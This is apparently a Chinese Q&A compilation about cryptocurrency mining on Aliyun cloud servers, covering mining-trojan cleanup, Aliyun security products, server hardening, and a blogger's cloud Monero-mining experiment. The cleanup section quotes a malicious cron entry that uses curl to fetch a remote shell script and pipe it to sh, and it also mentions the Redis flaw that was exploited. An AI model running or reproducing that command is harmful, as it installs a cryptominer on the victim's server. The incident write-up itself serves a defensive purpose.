阿里云对处理吗挖矿木马

⑴ 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

⑵ 阿里云服务器安全性怎么样有什么安全防护措施

大多用户在选购云服务器的时候首先考虑的就是阿里云服务器,不仅是因为阿里云服务器是国内知名度最高的云服务器品牌,还有一个重要原因就是阿里云服务器有一定的安全性保障吧。阿里云服务器本身自带一些安全防护措施。

1、免费开通云盾,提供网络安全、服务器安全等基础防护
DDoS 基础防护 ：
提供最高 5G 的 DDoS 防护能力,可防御 SYN flood、UDP flood、ICMP flood、ACK flood 常规 DDoS 攻击。

2、服务器安全功能： 安骑士
包含暴力破解密码拦截、木马查杀、异地登录提醒、高危漏洞修复的防入侵功能
免费提供云监控,并支持多种实时预警

3、站点监控：
提供对 http、ping、dns、tcp、udp、smtp、pop、ftp 等服务的可用性和响应时间的统计、监控、报警服务。

4、云服务监控：
提供对云服务的监控报警服务,对用户开放自定义监控的服务,允许用户自定义个性化监控需求
报警及联系人管理：提供对报警规则,报警联系人的统一、批量管理服务。支持多报警方式：短信、邮件、旺旺、接口回调。

除了以上自带的安全性防护措施之外,用户也可以选购阿里云安全类产品,进一步加强云服务器的安全。
1、阿里云云盾(AntiDDos)
功能：防护SYN Flood、UDP Flood、ACK Flood、ICMP Flood、DNS Flood、CC攻击等3到7层DDos攻
击。

2、安骑士（阿里云查、杀毒软件）
功能：轻量级服务器安全运维管理产品。在服务器上运行Agent插件,正常状态下只占用1%的CPU、
10MB内存。可以自动识别服务器Web目录,对服务器的Web目录进行后门文件扫描,支持通用
Web软件漏洞扫描和Windows系统漏洞扫描,对服务器常见系统配置缺陷进行检测,包括可疑
系统账户、弱口令、注册表等。

3、 云盾Web应用防火墙 —WAF(Web Application Firewall)
功能：基于云安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、Web服务器插件漏洞、木马
上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意CC攻击等。除了具有强大的Web
防御能力,还可以指定网站的专属防护,能轻松应对各类Web应用攻击。

1、服务器初始安全防护
安装服务器时,要选择绿色安全版的防护软件,以防有被入侵的可能性。对网站提供服务的服务器,软件防火墙的安全设置最高,防火墙只要开放服务器端口,其他的一律都关闭,你要访问网站时防火墙会提示您是否允许访问,在根据实际情况添加允许访问列表。这样至少给系统多一份安全。
2、修改服务器远程端口。
修改你的远程连接端口,例如 windows 的 3389,Linux 的 22 端口。应用服务尽量不要对公网开放,尤其是中间件服务,除了 web 服务所提供的 80,443 端口之外都应该尽量不要对公网开放默认端口,例如 MySQL 的 3306 ,Redis 的 6379 等等。
3、设置复杂密码。
一但服务器IP被扫描出来默认端口,非法分子就会对服务器进行暴力破解,利用第三方字典生成的密码来尝试破解服务器密码,如果您的密码足够复杂,非法分子就需要大量的时间来进行密码尝试,也许在密码未破解完成,服务器就已经进入保护模式,不允许登陆。
4、随时修补网站漏洞
如果网站出现漏洞时不及时处理,网站就会出现一系列的安全隐患,这使得服务器很容易受到病毒入侵,导致网络瘫痪,所以,平时要养成良好的习惯,时刻关注是否有新的需修补的漏洞。
5、多服务器保护
一个网站可以有多个服务器,网站被攻击时,那么我们就可以选择不一样的方式进行防范,针对不同的服务器,我们应该设置不同的管理,这样即使一个服务器被攻陷,其他的服务还可以正常使用。
6、利用好防火墙技术
现在防火墙发展已经很成熟了,防火墙可以选择安全性检验强的,检验的时间会较长,运行的过程会有很大负担。如果选择防护性低的,那么检验时间会比较短。我们在选择防护墙时,要根据网络服务器自身的特点选择合适的防火墙技术。
7、定时为数据进行备份。
定时为数据做好备份,即使服务器被破解,数据被破坏,或者系统出现故障崩溃,你只需要进行重装系统,还原数据即可,不用担心数据彻底丢失或损坏。

⑶ 云服务器挖矿践行 第一篇

三天以前看到壮乡金荣仔的文章，从中了解到可以利用阿里云服务器进行挖矿，收益可观，于是立即和作者进行了联系，咨询拜师的事情。

通过和孙师傅交流发现，因为写作让我们有了很多共同交流的基础，并且我居然已经关注了孙师傅有好几个月的时间了，这让我们很快建立了信任。

孙师傅在文章中提到正式收徒弟还要等一段时间，我觉得这段时间也不能浪费，还应该为将来拜师以后做一点准备工作。于是我立即开始对云服务挖矿这件事情进行了认真的思考并实践。

云服务挖矿的可行性，大概有这么几个方面。

一，云服务器挖矿的成本收益分析。

成本构成：挖矿的成本主要有三项，矿机的支出，电费，场地及相关管理费用；

收益构成：挖矿的收益主要来自两个方面，一是按照当前数字货币的法币价格可以不管成本而获得的收益，二是数字货币在未来增值获得的收益。

分析：云服务器的运算能力远远低于实体矿机，但是不用支付电费，这是最大的成本节省，另外，由于不需要场地，自己远程管理，场地和管理费用也趋近于零。

因此在算力有限的情况下，云服务器挖矿最大限度地消除了电费和场地的费用，这是这项技术的优势所在。而盈利的平衡点，将极大的取决于服务器费用的支出和当前币价的相对关系。

二，云服务器和挖矿币种的分析。

云服务器的种类有很多，主要分两种，CPU型和GPU型。

目前市场上的各种虚拟币算法也分两类，GPU友好型和CPU有好型。比特币以太坊，莱特币等绝大多数币种都属于GPU友好型，CPU友好型比较少，我了解到的只有大零币zec,小零币xzc,门罗币xmr。

所以这样一来，在服务器和币种的选择问题上，方向很清晰：CPU和GPU任何一个方向，选择算力性价比最高的云服务器和挖矿收益最高的币种。

三，实践。

李笑来的文章中提到过，任何挖矿的行为都不如直接到市场上去买来得容易。我也因此在之前的虚拟货币的学习中，很少关注挖矿的知识。同时对于服务器方面的知识也了解很少，所以一开始我只能用网络上能够搜索得到的办法进行实践， 以快速入门，开始积累。

网上能够直接搜索到的就是利用CPU服务器挖掘门罗币。文章链接如下。

于是我花了391.5元购买了三个月的阿里云轻量型服务器，配置如下。阿里云目前在搞活动，首单可以打七折。

开始进行实践。

经过了两天的折腾，终于在运行服务器上挖矿成功，但是算力只有140h/s，在这个算力下，要亏本一半。

具体折腾的过程中，遇到坑无数，也麻烦了我搞计算机的朋友很多，这个过程留待下一篇再写吧。

四，关于风险的思考。

目前来看，用云服务器挖矿服务器的价格是预付的，并且是固定的，所以挖矿是否有收益，取决于目前的虚拟货币的价格。从孙师傅的截图来看，目前收益还是很可观的。

近期的风险来自于币价的下跌，远期的风险来看，就是阿里云服务器会禁止挖矿行为。阿里云对于挖矿的行为，在网上有过很多的声明。在搜索服务器挖矿相关知识的时候，也发现有国外的服务器禁止挖矿。

长期来看，如果目前云服务器挖矿不赔本那么未来大概率是会有很大的收益的。

就在写这一篇的过程中，孙师傅的收徒标也发出来了，很快就要收徒弟啦。我也正好把这一篇当做我第一这周的作业。

⑷ 阿里云宁波代理，阿里云云安全中心怎么样呢

看你需求方向，如果是主机安全，漏洞修复、查杀病毒木马，勒索软件，挖矿病毒，这方面的，云安全中心的高级版就可以，有更高的需求那就实际来核计

⑸ 阿里云允许用云主机挖矿吗

是可以的。很多挖矿项目都可以使用云服务器，例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐，然而目前，因为各类硬件采购价格高、到货慢，然而时间不等人！综合对比下来，针对BZZ挖矿，推荐云服务器！
像Swarm BZZ这样的去中心化存储的情况下，以太坊生态中的热点数据每秒都在随时被调用和存储，所以除了CPU、内存和硬盘这三个主要的响应能力之外，还有一个要求宽带传输速度。
使用云服务器来部署bzz节点，核心理由就是一个字“快”，节点早一分钟上线，就能更早的获取到头矿！
经西部数码上千bzz节点部署的实践经验证明，bzz节点需要较高的带宽和超强的磁盘IO性能，以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置，可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器，或者选择更高配置的云服务器，如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽，可部署5-10个节点。

⑹ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

⑺ 阿里云因未及时上报漏洞被处罚，该漏洞有着怎样的严重性

该漏洞可以被犯罪分子或者网络黑客用于强制安装恶意程序、传播病毒并且植入木马等。而且系统漏洞很容易导致计算机上的关键信息和信息内容被盗，严重的情况会导致实际操作系统被破坏，计算机上的所有数据和信息都会丢失。

一个精致的计算机病毒程序，进入系统后一般不容易立即发病，而是潜伏在合理合法的文件中。病毒通常可以潜伏很长时间而不被发现。病毒的自限性越好，在系统中存在的时间越长，病毒感染的范围就越大。指病毒因某一时间或标志的发生而引诱病毒执行感或进攻的特点。计算机中毒后，很可能会导致所有正常程序无法运行，损坏计算机中的删除文件或不同水平的计算机文件。计算机病毒具有很强的隐藏性，有的可以根据计算机杀毒软件进行检测，有的基本找不到，这种病毒通常很难解决。